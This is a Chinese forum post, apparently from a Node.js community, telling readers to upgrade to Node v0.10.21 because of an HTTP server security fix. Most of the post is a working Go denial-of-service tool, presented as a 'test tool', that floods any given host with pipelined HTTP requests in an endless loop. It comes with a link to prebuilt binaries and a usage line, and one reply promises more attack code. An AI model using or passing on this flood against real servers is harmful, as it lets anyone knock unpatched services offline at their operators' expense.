提醒更新Node v0.10.21,以防exploiter
以下是官方说明:
This release contains a security fix for the http server implementation, please upgrade as soon as possible.
尽快更新吧,附上测试工具代码
package main
/*
A simple pipelining flood for nodejs
Author pathletboy[at]gmail.com
Date 2013-10-18
*/
import (
"flag"
"log"
"net"
)
func main() {
host := flag.String("host", "", "specify the target")
flag.Parse()
if *host == "" {
flag.PrintDefaults()
return
}
var conn net.Conn
var err error
if conn, err = net.Dial("tcp", *host); err != nil {
log.Fatal(err)
}
for {
if _, err = conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + *host + "\r\nAccept: */*\r\n\r\n")); err != nil {
log.Fatal(err)
}
}
}
编译好的bin(win/linux)
http://pb.itsong.com/floodnode.7z
floodnode -host=“xxx.com:xx”
5 回复
== golang 楼主黑得漂亮 (开玩笑哈~)
有一个非常简单的node攻击代码, 等过几天再发吧. cnode刚才也被攻击了.
讲解一下?
已更新
感谢通知。